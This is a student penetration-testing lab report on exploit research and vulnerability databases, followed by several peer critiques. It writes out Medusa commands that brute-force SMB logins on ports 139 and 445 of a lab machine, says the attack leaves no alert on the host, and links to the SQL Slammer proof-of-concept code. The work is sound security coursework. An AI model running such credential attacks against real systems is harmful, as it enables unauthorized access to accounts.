Abstract
In this lab we will research exploits and test whether they actually work against our virtual systems. We will also discuss testing techniques that are designed to expose security issues, along with vulnerability testing and network penetration testing. Vulnerabilities can easily become the target of exploits. In this lab we will talk about how vulnerabilities can be used to retrieve information and gain access to machines, and we will develop a working knowledge of exploits and their target victims.
We will be dealing with tools that are included in Backtrack 3 and some that are not precompiled in it. We will also attempt to exploit vulnerabilities that were reported by Nessus during lab 3, and we will research exploits through publications that provide daily information about current exploits.
Literature Review
Security vulnerabilities in new and existing software are the norm rather than the exception. Working with the knowledge that we will always be forced to update our products on a regular basis is just “how it is.” Since software is created by people, and since people are not perfect, the constant discovery and patching of new security vulnerabilities is not going away any time soon. Security vulnerabilities present a real issue in terms of the confidentiality, integrity, and availability of systems and services. Those vulnerabilities can become the subject of exploits and be used for nefarious purposes to gain unauthorized access to resources on the systems being targeted. For this reason, red teaming and network penetration testing have become big business. The readings for this lab focus on performing a structured penetration test through proper documentation, for the benefit of the vendors writing new or updating existing software.
In the article Network Penetration Testing, Liwen He and Nikolai Bode present a general overview of the process of penetration testing as they see it, as well as two types of testing, a vulnerability summary, and the tools used. According to He and Bode, current IP networks are not sufficiently secure; hackers are able to exploit existing vulnerabilities in the network architecture, obtain unauthorized access to sensitive information, and subsequently disrupt network services (He & Bode, 2005). This observation forms the basis of their article as well as the basis behind the other articles for this lab. The focus of their article is on the tools generally used for penetration testing and on the future of the topic, including at least semi-automated attacks. Since the focus of lab four was more on the exploits themselves than on the tools used, the most interesting part of the article, in our opinion, is the general penetration testing process figure they present (He & Bode, 2005). This flow chart seems to be a visual representation of what James R. Davidson wrote about in his 2005 article on a Vendor System Vulnerability Testing Test Plan (Davidson, 2005). That article lays out a structured and complete approach to attacking a vendor's SCADA system so that it can earn a “secure” stamp of approval from Idaho National Laboratory, walking through each step to be covered and what will be attacked by researching the product submitted for evaluation. According to Davidson, the test plan supports in-depth vulnerability testing of the vendor's SCADA/EMS, which also includes baseline scanning to validate the implementation of the vendor's recommendations from the baseline report. The vulnerability testing provides functional security testing through an in-depth security analysis of the vendor's system (Davidson, 2005). The article lays out a very structured and complete documentation path for performing those tests, and it is something we should look toward for our own red-teaming exercise at the end of the semester. Davidson states that his team performs a baseline analysis, or recon, prior to performing the tests, and they could probably make use of some of the tools that He and Bode present, such as WS_Ping ProPack or Netcat (He & Bode, 2005).
Once the baseline scan that Davidson discusses is complete, performed with tools such as those from He and Bode, Davidson's team could look at the findings of Herbert H. Thompson and Scott G. Chase in their 2003 article Red-Team Application Security Testing. In that article they explain that application security testing is not part of the functional testing that goes into usual software development and needs to be performed by people other than typical software testers (Thompson & Chase, 2003). Where Davidson could make use of the Thompson and Chase article is in their methodology for application security testing. The process Thompson and Chase use involves the planners creating requirements for the tools used in the testing and the test plans, determining whether the tools exist or need to be developed, assigning a value to each feature that needs to be tested, running the tests, and creating a report (Thompson & Chase, 2003). While most of this is covered by Davidson, the parts that are truly lacking from his article are the decision to find or develop a new tool and a good scoring system for ranking each feature to be tested in terms of importance.
The Thompson and Chase article seems to be the most relevant to lab four. Assigning a score to each feature of a system on which recon has been performed shows which features are the most important and possibly the quickest way to gain access. Where we found this article lacking, both for the lab and in general, was in its absence of any solid references. We did find it interesting that, while the article's final section on protecting software-based revenue recommended NOT using a HASP device, the journal ran an ad for that very device alongside an article that said not to use it (Thompson & Chase, 2003). Building on that scoring system, Davidson showed that a well-structured approach to performing penetration testing and red teaming is something we should not overlook in this course. By having these plans and documents laid out after performing initial recon of a target system, the team performing the actual test can be made much more efficient and can work through the problem at a much faster pace. That is what we saw as the tie-in to lab four for this particular article. The only real issue we saw with the article was that the authors chose not to list possible expansion into non-SCADA systems (Davidson, 2005). With the concepts of the first two articles in mind, the third, by He and Bode, lists a number of tools that are very effective in capturing the recon data needed to complete the documentation in Davidson, as well as the tools to perform the actual penetration, while keeping an eye on the future of penetration testing. The figure presented by He and Bode also provides a well-thought-out visual plan we could follow, for readers who prefer a diagram to prose (He & Bode, 2005).
Methods
There were three areas of focus in this lab: a literature review, research into working exploits uncovered by Nessus in lab three, and research into the vulnerability and exploit databases available on the Internet. The focus of the literature review for lab four was on penetration testing and red teaming. By combining the focus of the literature with the objectives of the lab, we hoped to gain a better understanding of those objectives and provide complete results.
The Nessus scan in lab 3 reported the target machine as having five open ports and seventeen low vulnerabilities. No vulnerabilities were classified as medium or high according to Nessus. The five ports are Port 137-UDP netbios-ns, Port 445-TCP Microsoft-ds, Port 135-TCP epmap, Port 123-UDP NTP, and Port 139-TCP netbios-ssn.
Port 137-UDP NETBIOS-NS
This port handles the NetBIOS name service. Nmbscan may be able to probe the machine through this port by scanning for shares.
Port 445-TCP Microsoft-ds
This port handles traffic for Microsoft Active Directory and Windows shares. The Medusa Parallel Network Login Auditor may be able to exploit the machine through this port.
Port 135-TCP epmap
EPMAP stands for End Point Mapper. This port handles location services used by DHCP, DNS, and WINS.
Port 123-UDP NTP
NTP stands for Network Time Protocol; this port is used for time synchronization.
Port 139-TCP netbios-ssn
This port handles the NetBIOS session service. Medusa has an SMBNT module which tests against the netbios-ssn service on port 139.
Medusa was used to attack port 139. Medusa was run in Backtrack with the command medusa -h 192.168.2.1 -U host.txt -e ns -M smbnt -m NETBIOS -n 139, as shown in figure 1-1. A text file was created with popular user names such as root, admin, and administrator. The smbnt module will try port 445 first and then 139; however, the command above uses port 139 exclusively. “The SMBNT module tests accounts against the Microsoft netbios-ssn (TCP/139) and microsoft-ds (TCP/445) services” (Medusa Parallel Network Login Auditor :: SMBNT, 2009). To use port 445, use the command medusa -h 192.168.2.1 -U host.txt -e ns -M smbnt, as shown in figure 1-2.
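The commands above can be consolidated into a short sketch. This is a minimal example, assuming the lab's target address of 192.168.2.1; the username list contains the names mentioned above.

    # build a small username list from popular account names
    printf "root\nadmin\nadministrator\n" > host.txt

    # -e ns tries a null password (n) and the username as the password (s);
    # -m NETBIOS forces NetBIOS mode so only TCP/139 is used
    medusa -h 192.168.2.1 -U host.txt -e ns -M smbnt -m NETBIOS -n 139

    # default behavior: the smbnt module tries microsoft-ds (TCP/445) first
    medusa -h 192.168.2.1 -U host.txt -e ns -M smbnt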
Nmbscan was used in Backtrack; the command nmbscan -a shows all domains, master browsers, and servers. An example of the scan on our virtual subnet is shown in figure 1-3. The scan looks for SMB and NetBIOS shares: nmbscan sweeps the subnet for live hosts and reports back information using NetBIOS. If only the domains are desired, the -d option will return them. The tool can also obtain NMB, SMB, NetBIOS, and Windows hostnames, as well as detailed information about each host, such as its IP address, IP hostname, MAC address, and more.
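The nmbscan invocations described above look like the following sketch; the single-host query at the end uses nmbscan's -h mode, with the lab target address shown purely as an illustration.

    # enumerate all domains, master browsers, and servers on the subnet
    nmbscan -a

    # report only the domains
    nmbscan -d

    # scan a single specified host (illustrative; any live address works)
    nmbscan -h 192.168.2.1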
In the third part of the lab we were given the tasks of researching exploit code and exploit repositories, researching the level of expertise required to use exploit code, and auditing a sample of current exploits against the lab one taxonomy for any interesting conclusions that could be drawn. With the use of BugTraq as a vulnerability database source out of the question, per the lab design document, we set out in search of “security vulnerability databases” and “exploit code” through Google. The results of these two search terms formed our source material. With a better understanding of these two topics, we dove into discovering what level of expertise is involved in exploit code. Again we returned to Google, this time using the term “SQL slammer exploit code.” This term was used to find the specific proof-of-concept code that made the Slammer worm possible; that code can be found at http://downloads.securityfocus.com/vulnerabilities/exploits/sql2.cpp. Finally, we took a closer look at the chosen security vulnerability repositories. The goal was to compare specific vulnerabilities to the taxonomy created in lab one to better understand the relationship of attack tools and OSI layers to the sampling of vulnerabilities.
Findings
The virtual machines are teamed together using a virtual LAN segment, with static IPs and no access to the outside world, so they do not rely on a server to provide services such as DHCP, DNS, or WINS; several of the tools and exploits we examined are web based or depend on services that are not running. Medusa was very helpful in extracting information such as actual user names and passwords for the target machine. The downside of using Medusa is that the attacker has to have text files of usernames and passwords for Medusa to use. These text files are easily generated, and ready-made files are available for download via a Google search. Other modules are available for use with Medusa for FTP, IMAP, POP3, SSHv2, Telnet, and more. This information is available at http://www.foofus.net/~jmk/medusa/medusa.html. With pre-assembled files, Medusa can easily recover a username and password without any notification to the host user: nothing appears on the local host informing the user that there were too many failed login attempts. After reviewing information about Medusa, we noted that information gathered with PwDump could also be used to gain entrance to the machine.
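As a sketch of the username/password file workflow described above, assuming an illustrative wordlist named passwords.txt (in practice a larger downloaded list would be used):

    # hypothetical minimal password list; real runs would use a full wordlist
    printf "password\nletmein\nchangeme\n" > passwords.txt

    # -U supplies the username file, -P the password file
    medusa -h 192.168.2.1 -U host.txt -P passwords.txt -M smbnt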
We begin by defining what a vulnerability and an exploit are. According to Webster's, vulnerability is the state of being open to an attack (Merriam-Webster). Also according to Webster's, an exploit is a furtherance or outcome (Merriam-Webster). With that in mind, we postulate that in information security a vulnerability exploit is the furtherance or outcome of being open to attack. Applied to this lab, an exploit is the attack itself, while a vulnerability is an attackable vector. CVE defines a vulnerability as a mistake in software that can be directly used by a hacker to gain access to a system or network (The MITRE Corporation, 2009). It is with this in mind that we continue.
Exploit code can also be referred to as proof-of-concept code written to demonstrate an exploit. It is software code written with the intent of exploiting a vulnerability, or submitted as proof that a vulnerability exists. Oftentimes it is the latter that creates the former. When proof-of-concept code is created and ultimately publicly uploaded to sites such as BugTraq, taking that code and using it for nefarious purposes is nothing more than a matter of ethics. Anyone with knowledge of BugTraq could download exploit code and use it in the wild to attack the unsuspecting or ignorant. Such was the case with the SQL Slammer worm: code written to prove a point was turned into one of the most widespread network attacks of all time. The only requirements for the perpetrator of this attack were knowledge of BugTraq and the ability to copy and paste text. Oftentimes the exploit code uploaded for public consumption is nothing more than a batch or shell script or simple C-based code. This makes the level of expertise required in finding and using exploit code low.
Security vulnerability databases like BugTraq are digital warehouses of information on current and past vulnerabilities as they are discovered. BugTraq is well known in the vulnerability database category, but it is not the only free and open source of information on security bugs, exploits, holes, and vulnerabilities in the software most of us use every day. We found four free sites that also perform the function of a vulnerability database: Common Vulnerabilities and Exposures (CVE), the National Vulnerability Database (NVD), the US-CERT Vulnerability Notes Database, and the Open Source Vulnerability Database (OSVDB). CVE considers itself a dictionary of publicly known information security vulnerabilities and exposures (The MITRE Corporation, 2009). CVE differentiates itself by assigning a CVE identifier to each entry in its database and linking to the actual source of the information requested (The MITRE Corporation, 2009). The NVD is the U.S. government repository of standards-based vulnerability management data. This data enables automation of vulnerability management, security measurement, and compliance; NVD includes databases of security checklists, security-related software flaws, misconfigurations, product names, and impact metrics (NIST). The US-CERT Vulnerability Notes Database covers all vulnerabilities that US-CERT is aware of but that are not severe enough, in the opinion of US-CERT, to warrant a technical alert (US-CERT, 2009). Vulnerability notes include technical descriptions of the vulnerability, as well as the impact, solutions and workarounds, and lists of affected vendors (US-CERT, 2009). The OSVDB is an independent and open source database created by and for the security community. The goal of the project is to provide accurate, detailed, current, and unbiased technical information on security vulnerabilities, to promote greater, more open collaboration between companies and individuals, to eliminate redundant works, and to reduce the expenses inherent in the development and maintenance of in-house vulnerability databases (Open Source Vulnerability Database, 2008).
Based on the four security vulnerability databases described above, we chose CVE as the source for our in-depth analysis of how exploits align with the penetration testing taxonomy from lab one. Twenty-one CVE identifiers were chosen, three per OSI layer, to see if any conclusions could be drawn. The CVE identifiers are aligned with the taxonomy in Table 1 in the tables section. The chosen vulnerabilities are focused more toward Macintosh and Cisco vulnerabilities; because Windows and Linux vulnerabilities are so prevalent and easy to find, we chose to show that both Apple and Cisco are not perfect. In this table we show that IOS, the OS that could be considered to run the Internet, is not exempt from network attack.
Issues
Some tools, such as nmbscan, were not precompiled in Backtrack, even though the menu lists the software under Information Gathering. We simply downloaded the RPM and installed it with rpm -i.
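A sketch of that install, assuming the RPM has already been downloaded; the package file name below is illustrative and will vary with the version obtained.

    # install the downloaded package (file name is illustrative)
    rpm -i nmbscan-1.2.5-1.i386.rpm

    # confirm the binary is on the path, then run a full scan
    which nmbscan
    nmbscan -a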
Conclusions
Lab four presented many useful insights into penetration testing. While searching for exploits and tools, several of the tools would not work in the current environment, mainly because several key components were missing. There is no DHCP server and no DNS server, and nothing has been done to leave an opening; these machines are barely used, and most ports and services are off or not running.
Based on Table 1, we drew three conclusions. The first was that finding vulnerabilities for each layer of the OSI model was not difficult, as three are listed for each layer. The second was that most of the listed exploits deal with denial-of-service style vulnerabilities, with 10 DoS vulnerabilities versus the next closest type, arbitrary code execution, at 5. The third was that every operating system and piece of software in existence is susceptible to vulnerability and attack.
Tables & Figures
Table 1:
OSI layer | CVE ID | Exploit | Product | McCumber Coordinate
7 | CVE-2009-1859 | Arbitrary Code Execution | Adobe Reader 7 – 9 | Integrity, Transmission, Technology
7 | CVE-2009-0944 | Denial of Service | Spotlight in OS 10.4.11 – 10.5.6, Microsoft Office for Mac import | Availability, Processing, Technology
7 | CVE-2009-0552 | Arbitrary Code Execution | Internet Explorer 5 & 6 on Windows XP, 2003, Vista, 2008 | Integrity, Transmission, Technology
6 | CVE-2009-1157 | Denial of Service | TLS for Voice Proxy, Cisco ASA & PIX 7.0 – 8.1 | Availability, Processing, Technology
6 | CVE-2009-0152 | Privileged information disclosure | SSL connections to AIM disabled, iChat in OS 10.5 before 10.5.7 | Confidentiality, Transmission, Technology
6 | CVE-2009-0161 | Spoofed Certificate ID | OpenSSL module for Ruby, Mac OS 10.4.11 – 10.5.6 | Confidentiality, Transmission, Technology
5 | CVE-2009-0846 | Denial of Service / Arbitrary Code Execution | krb5 before 1.6.4 | Availability, Processing, Technology
5 | CVE-2009-0079 | Elevated privileges | Windows RPCSS, Windows XP & 2003 | Confidentiality, Processing, Technology
5 | CVE-2007-5225 | Privileged information disclosure | Named Pipes, Solaris 8 – 10 | Confidentiality, Processing, Technology
4 | CVE-2009-0077 | Denial of Service | Microsoft ISA Server 2004 & 2006 TCP session state | Availability, Processing, Technology
4 | CVE-2009-0159 | Arbitrary Code Execution | NTP before 4.2.4p7-RC2 | Integrity, Transmission, Technology
4 | CVE-2008-1150 | Denial of Service | VPDN PPTP adapter, Cisco IOS before 12.3 | Availability, Processing, Technology
3 | CVE-2009-1155 | Bypass Authentication | AAA override-account-disable, IPsec VPN, Cisco PIX & ASA | Confidentiality, Transmission, Technology
3 | CVE-2007-0069 | Arbitrary Code Execution | Crafted IGMPv3 packets, Windows XP, Server 2003, Vista | Integrity, Transmission, Technology
3 | CVE-2008-3809 | Denial of Service | Malformed Protocol Independent Multicast packet, IOS 12.0 – 12.4, Cisco 12000 GSR | Availability, Processing, Technology
2 | CVE-2006-4292 | Denial of Service | Niels Provos Honeyd before 1.5b, crafted ARP packet | Availability, Processing, Technology
2 | CVE-2005-1942 | Bypass Authentication | Cisco switches with 802.1x port security; crafted CDP packet causes anonymous access | Confidentiality, Transmission, Technology
2 | CVE-2009-0058 | Denial of Service | Vulnerability scanner traffic causes DoS in Cisco WLC modules, Cat. 6500 & 3750 | Availability, Processing, Technology
1 | CVE-2000-0451 | Denial of Service | Intel Express 8100 ISDN router, large ICMP packets | Availability, Processing, Technology
1 | CVE-2008-6497 | Denial of Service | Neostrada Livebox ADSL router, multiple HTTP requests for the /- URI | Availability, Processing, Technology
1 | CVE-2008-1453 | Arbitrary Code Execution | Bluetooth stack in Windows XP & Vista via large series of SDP packets | Integrity, Transmission, Technology
Figures:
Figure 1-1 Medusa scanning on port 139
Figure 1-2 Medusa scanning on port 445 by default
Figure 1-3 Nmbscan scanning for hosts using Netbios, SMB, and others
Works Cited
Davidson, J. R. (2005). Vendor System Vulnerability Testing Test Plan. Idaho Falls: Idaho National Engineering and Environmental Laboratory.
He, L., & Bode, N. (2005). Network Penetration Testing. The First European Conference on Computer Network Defence (pp. 3-12). Wales: University of Glamorgan.
Medusa Parallel Network Login Auditor :: SMBNT. (2009). Retrieved July 5, 2009, from http://www.foofus.net/~jmk/medusa/medusa-smbnt.html
Merriam-Webster. (n.d.). exploit – Definition from the Merriam-Webster Online Dictionary. Retrieved July 5, 2009, from Merriam-Webster Online Dictionary: http://www.merriam-webster.com/dictionary/exploit
Merriam-Webster. (n.d.). vulnerability – Definition from the Merriam-Webster Online Dictionary. Retrieved July 5, 2009, from Merriam-Webster Online Dictionary: http://www.merriam-webster.com/dictionary/vulnerability
NIST. (n.d.). National Vulnerability Database Home. Retrieved July 5, 2009, from National Vulnerability Database: http://nvd.nist.gov
Open Source Vulnerability Database. (2008). Open Source Vulnerability Database. Retrieved July 5, 2009, from Open Source Vulnerability Database: http://osvdb.org/about
The MITRE Corporation. (2009). CVE – Common Vulnerabilities and Exposures (CVE). Retrieved July 5, 2009, from Common Vulnerabilities and Exposures: http://cve.mitre.org
Thompson, H. H., & Chase, S. G. (2003, November 1). Red-Team Application Security Testing. Dr. Dobb's Journal, pp. 18-27.
US-CERT. (2009). US-CERT Vulnerability Notes Database. Retrieved July 5, 2009, from US-CERT: http://www.kb.cert.org/vuls
Team 2 begins with an abstract describing the lab requirements. In the sentence “Also a knowledge of exploits and there target victims,” I believe the correct word to use would be “their” instead of “there.” There were a few other spelling and grammatical errors, but I am using this as an example. They proceed to state that they will be using tools contained in Backtrack 3 and others that are not precompiled in Backtrack 3, and that they will be attempting to exploit vulnerabilities that had been reported by Nessus. They will also research publications of current exploits.
They begin their literature review with a discussion of application vulnerabilities and then discuss the common theme of the literature reviews, “performing a structured penetration test through proper documentation for the benefit of the vendors writing new or updating existing software.” The first article they discuss is Network Penetration Testing (He & Bode, 2005). They compare this article to Vendor System Vulnerability Testing Test Plan (Davidson, 2005) and discuss how both cover the steps in the process of penetration testing. I agree with that assessment. These articles were very informative, and I found the areas of process and documentation applicable to our current lab. Network Penetration Testing (He & Bode, 2005) also lists a large number of tools and vulnerabilities that will be helpful in this and future labs. They proceed to review Red-Team Application Security Testing (Thompson & Chase, 2003). Although I feel that one of the major points of the article was the functional decomposition of applications to test each module separately, this review did not mention it at all. They seem to equate application testing to system testing and use that to find relevance to our current laboratory assignment. I believe it can be summed up in a sentence from the introductory paragraph of the article: “In this article, we describe a methodology for finding the underlying causes of these vulnerabilities—bugs in software” (Thompson & Chase, 2003, p. 18). Since part of our laboratory assignment was to find stand-alone exploitation tools, compare them against the OSI model, and look for patterns, this statement is a hint that we may find most of them in the application layer.
In the methods section they discuss the results of the Nessus scan from lab 3 and the vulnerabilities that each open port represents. They go into an in-depth discussion of what each open port does. They proceed to describe vulnerabilities that apply to each open port and discuss Medusa, which exploits services on port 139. They also discuss using nmbscan, which will “show all domains, master browsers, and servers.” Nmbscan is more of a reconnaissance tool than an exploit tool. They did not document any other exploits. They list two web sites containing vulnerability data in this section, BugTraq and SecurityFocus, and list four additional security and vulnerability databases in their findings section.
The descriptions of the various open ports and their associated services were very good. They also included a good discussion of the various vulnerability databases. They seem to conclude that the vulnerabilities listed in the databases are evenly distributed throughout the OSI model, whereas our own conclusion was that more than 90% fall in the application layer. Also, they found and tested only one stand-alone penetration tool to use against the vulnerabilities identified in their Nessus scan. Their document could also use some proofreading to eliminate some of the minor errors.
Group 2 starts off with a decent abstract. The group talks about what is going to be done in each part of the lab. One thing missing from the abstract is some type of tie-in to the rest of the labs in this course; the group could have described how this lab relates to the other labs and what the overall goal of this lab was trying to accomplish.

The group did a nice job opening the literature review. They explained how vulnerabilities will always be part of the process of developing software because of human error, and how these vulnerabilities can lead to people developing exploits to take advantage of them. The group then relates the articles given in this lab to this previous statement by explaining that the articles are about “performing structured penetration tests through documentation.” The rest of the literature review was done very well. The group takes each article, describes what the article is about and where it fits in the current lab, and shows how the articles fit together in relation to this lab. They also explain what each article lacks and how it could have been improved. The group covered the literature review very thoroughly, except that I did not see anything relating to the research question of each of the articles.

The beginning of the methodology section gave a brief overview of the whole lab and explained how the literature review tied into it. In the next section of the methodology the group gives its findings from the scan done by Nessus in lab 3, followed by a description of each of the open ports. I do not understand why this is in the methodology section; I believe it should be in the results section of this lab report. I also did not find anywhere in the methodology a description of how they came up with the table of exploits given at the end of the report; there should have been a mention of how they created that table. The group did a nice, detailed job of explaining the process of testing tools, but did not explain what the purpose of these tests was. The last part of the methodology described the last part of the lab. The group covered almost all of this section of the lab and how they were going to accomplish each part; the only thing not mentioned was an explanation of the evaluation of the level of expertise involved.

The first part of the findings describes what was discovered in the first part of the lab. This part seemed to lack a lot of the information needed to cover the questions given in the lab. The group failed to include any discussion of the table that was created to show the relationship of the exploits in Nessus or Nmap to the OSI model and McCumber's cube; the group does not even mention Nessus or Nmap. They cover a couple of other programs, like Medusa and PwDump. The questions in the lab ask about the exploits used in Nessus or Nmap, and those were not covered. The group did a nice job explaining how they tested Medusa and the results they got from running it, but nothing more than that. The next part of the findings gives a good definition of what a vulnerability is, though this seemed out of place; it should have gone at the beginning of the results or even in the abstract. The rest of the findings were about the last part of the lab. The group discusses the different sites that they found and did a nice job of describing the level of expertise of each site.
They gave very good descriptions of each of the sites. Examining the findings in this group's lab, it seemed that the group spent a lot of time on the last part of the lab and hardly covered any of the first part. In the issues section the group talks about how one piece of software was not installed in Backtrack; I think this should have been included in the methodology section of the report, explaining how they installed it and ran it. In the conclusion the group explains that they had trouble running a lot of the exploits due to not having the right services to use the exploits against and the lack of use of the computers in the network. This should not have been in the conclusion; it should have been brought up in the issues. The second part of the conclusion focuses on the table created in the first part of the lab; I do not understand why this was not given in the results section of the lab. The conclusion lacked any closing on the lab. I did not see anything about the overall experience of the lab and what was learned.
The abstract is a good summary but contains a few spelling and word choice errors. The literature review is an excellent treatment of the topic, subject matter, and the assigned literature. The discussion on the papers seems to talk more about how the articles discuss penetration testing than how they will relate to the topic of the current laboratory exercises. Penetration testing is important but the discussion in the papers about how that relates to finding exploits, researching them, and ultimately fixing them is the real focus of these exercises. I had a hard time following the point of the third paragraph of the literature review about application development and testing. You mention the Thompson/Chase paper saying that security testing isn’t a part of the development process. Should it be? Surely in this security class we should make the determination on whether or not we agree with this statement. The discussion on the ads that appeared in the Thompson paper was interesting. While the ad is mentioned as conflicting with the opinion of the paper, the authors don’t give their opinion on this conflict. One thing to watch in future literature reviews is the “person” that is being used. It switches between singular and plural and makes it hard to read from the perspective that this was written by a group.
The methodologies seem to be almost entirely skipped over, and the report moves straight into the discussion of the results before we even know what is being run and what it is being run against. What machine is Medusa being run against? Presumably this would be a Windows machine, based on the protocol that Medusa works with. How is the nmbscan tool an exploit tool? Would it be more of a reconnaissance tool if it discovers SMB servers on a network? The methodologies for the “third part” make no mention of the findings from the previous section and how they would tie into this process.
The findings section is as confusing as the methodologies. The findings from running the Medusa tool are given, followed by a definition of “vulnerability” and “exploit.” These would have been better placed in the literature review rather than the findings section. There is no mention of how the 21 CVE vulnerabilities were selected, and the decision to use Apple and Cisco vulnerabilities doesn't fit with the lab environment. Were these tested at all on other equipment, then?
The sentence in the “issues” section “Simply downloaded the [sic] RMP and installed using rpm -I and done” is really informal and grammatically incorrect.
The conclusions section misses a lot of key points that should have been concluded from the lab data. Simply missing a DHCP and DNS server in our test environment doesn’t mean that the test machines can’t be exploited.
Among the commendable attributes of team two’s lab write-up, I found the discussion of the concepts of ‘vulnerability’ and ‘exploits’ in the ‘Findings’ section to be nicely worded. Additionally, I found the literature review refreshing in that it was not merely a summary, but a serious attempt to analyze the concepts in the articles, and how they related to the lab exercise. The ‘Methods’ section was extensive, although some of the material appeared out of place. The screen shots were a nice visual addition, and the vulnerability listing table nicely formatted.
Some substantial deficiencies can be found in this team’s report, however. Foremost, the literature review, while admirable in conceptual aim, had significant issues with grammatical subject identifiers. The author(s) slipped between the first person singular and plural at seemingly random intervals. This was distracting, and likely out of place in a document purported to be of an academic nature. Certainly, a consistent use of grammatical rules would greatly improve this section.
Additionally, I thought the ‘Methods’ section had material that could properly be considered ‘Findings.’ As using ‘Nessus’ to automate vulnerability detection on the target host was indeed part of the methodology, it only seems logical that the results of this scan should be displayed in the ‘Findings’ section. This is a relatively minor detail, but one which should be an obvious target for improvement in future lab write-ups.
In regard to the first part of the experiment in the use of ‘Medusa,’ I must ask: did you really obtain any results? I see screenshots of the tools running, and saw a description of the tool's capabilities, but observed no indication that a real ‘exploit’ was achieved. Granted, this is a contrived situation, as the share passwords were surely already known to the testers; but could a more realistic experiment, using a share password unknown to the ‘attacking’ part of the team, have been implemented? As it appears in the current report, nothing was really accomplished beyond running ‘Medusa’ against the target machine and sidestepping the issue of significant results. Was anything learned beyond what was already apparent from the reconnaissance scan; or furthermore, what exactly was ‘exploited?’
Finally, perhaps the most significant criticism lies in the ‘self selection’ nature of the vulnerability database content analysis. I believe the aim of the laboratory exercise was to determine, if possible, whether any pattern appeared in the database listings ‘in entirety’ with respect to the OSI model. Choosing an equal number of samples for each layer, or category, of the OSI model and then drawing general conclusions from these samples is a most grievous error in using statistical analysis. I would submit that this team did not answer the question of ‘general patterns’ with respect to the OSI layer; furthermore, the assertion that ‘most of the listings are DOS exploits’ cannot be taken seriously. This assertion may be true of ‘your’ self-selected data, but it certainly cannot be applied to anything other than this. I believe these lab exercises leave much of the implementation choices up to the individual teams, but I see no real purpose or usefulness in the approach adopted by this team in the vulnerability database analysis portion of this lab; it is simply a ‘nice’ orderly list which proves nothing.
One of the first items noticed about this lab report is the continuous use of the words “we” and “I.” The team should not be using the word “I” at all in a team lab report. Another item was the writing itself: “Also a knowledge of exploits and there target victims” is not a complete sentence, apart from the misuse of “there” for “their.” There were many inconsistent verb tenses throughout the entire lab report. While the abstract did state exactly what the team was going to do during the lab experiment, it read just like the objectives of the lab that were given to all the teams; the only exception is that the group does point out that they will be using Nessus and not Nmap. This lab report had one of this team's best beginning paragraphs; they did not just dive right into the literature review, but first gave a brief synopsis of the main idea of all the articles. The citations for the literature review are still not in the proper APA 5 format. I am not too clear on what the following means: “This forms the basis of their article as well as the basis behind the other articles for this lab.” I do not think that all of the articles deal with the fact that IP networks are not sufficiently secure; that applies only to the He & Bode article. It is true that the other articles believe that standard equipment and software are not secure enough, but the other articles are not only about IP networks.
In the second paragraph of the literature review, the team states an opinion and then puts a citation after it. Is the opinion in the article? The group states “This figure or flow chart…,” but they never give the figure number from the article, or even a picture of the flow chart. I found it interesting that the group talks about how some of the authors of the articles could use the other required readings for this lab as a baseline for their methodology; I wish the group had gone into more detail on why the authors should have read each other's articles before beginning their work. Even though this literature review was somewhat cohesive, it still seemed like a list. I had a hard time getting past some of the grammatical errors, for example “The only real issue I saw with the article was on how they chose no list possible expansion into non-SCADA systems (Davidson, 2005).” Please proofread your paragraphs before submission. The group has a decent methods section, but when listing all of the ports it lost its ease of reading; all of the separated information could have been combined into one paragraph. I do not think the group clearly finished part 2 of this lab. The level of expertise is only discussed for one of the sources of exploits; all of them need to be discussed. While the group did put exploits into the proper grid, they did not draw any conclusions from it, nor did they have a sample to prove their case. While part 1 was just about all there, most of part 2 was not. And once again, please proofread your lab report before submission.
The abstract is a good summary of what team 2 intends to do. Spell check and grammar check should be used before submitting the paper. The literature review contains their discussion of sources and is organized by publication. It is a good summary of what the authors are trying to convey to us; however, I do not believe team 2 does an adequate job of tying the articles back to how they relate to the lab exercise.
The methods section is very short and seems to blend in with the results section, which made the paper hard to follow. Part 2 seems to be lost in the findings section. Again, as with some of the other teams, they take the route of explaining what the vulnerability databases do as opposed to the level of expertise needed to run the tools on the listed sites. I don't think we needed a definition from Merriam-Webster of what vulnerability and exploit are. Rather than extensively describing what the vulnerability sites were used for, research into what levels of expertise were needed to run the exploits on these sites should have been provided.
Their conclusions were good, and I agree with their thoughts on the third conclusion; however, that conclusion should be a given considering the number of courses taken with Professor Liles.
Team two gave a detailed overview of the laboratory exercise within their abstract section.
In the literature review section, I was not sure what article team two was referring to when they stated “This figure or flow chart seems to be a visual representation of what James R. Davison wrote about in his 2005 article on a Vendor System Vulnerability Testing Test Plan.” I agreed with team two's analysis of the article Vendor System Vulnerability Testing Test Plan, in that, as team two stated, “The article lists a very structured and complete documentation path for performing those tests, and is something that we should most likely look towards for our own red-teaming exercise at the end of the semester.” I had noticed that other teams interpreted the article as being somewhat unscholarly. Team two described the article's omission as “the parts that are truly lacking from his article are the decision to find or develop a new tool, and a good scoring system to assign to each feature to test in terms of importance.” However, I must disagree, because the development of a new tool was out of the scope of the paper, for existing tools were to be used.
In the methods section, when team two stated “The Nessus scan in lab 3 reported that target machine having five open ports and seventeen low vulnerabilities,” they did not specify what virtual machine was being targeted. Since they listed the open ports as Port 137-UDP netbios-ns, Port 445-TCP Microsoft-ds, Port 135-TCP epmap, Port 123-UDP NTP, and Port 139-TCP netbios-ssn, it was some type of Windows machine, but they did not specify whether it was Windows Server 2003, Windows Service Pack 0, or Windows Service Pack 3.
Some of the tools that were used to find similar exploits included Medusa and Nmbscan.
In the findings section team 2 listed the online sources they found for identifying exploits, which included Common Vulnerabilities and Exposures (CVE), the National Vulnerability Database (NVD), the US-CERT Vulnerability Notes Database, and the Open Source Vulnerability Database (OSVDB). Team two did not describe the expertise involved with the different sites. Team two also did not place the exploits that were discovered on the Internet into the lab 1 styled table/grid.
In the issues section team two stated “There were some tools that were not complied in Backtrack, such as NMBScan but mentions that the software is available under Information Gathering.” My team has also come across problems installing some tools in Linux environments. I do not know why they cannot install as easily as web browsers such as Mozilla Firefox or SeaMonkey, or as Windows applications. That is one reason why UNIX or Linux will not be replacing Windows anytime soon in the mainstream.
In the conclusion section, I had to disagree with the statement “The first conclusion we drew was that finding vulnerabilities for each layer of the OSI model was not difficult, as three are listed for each layer.” Most of the vulnerabilities out there are found in the application layer of the OSI model.
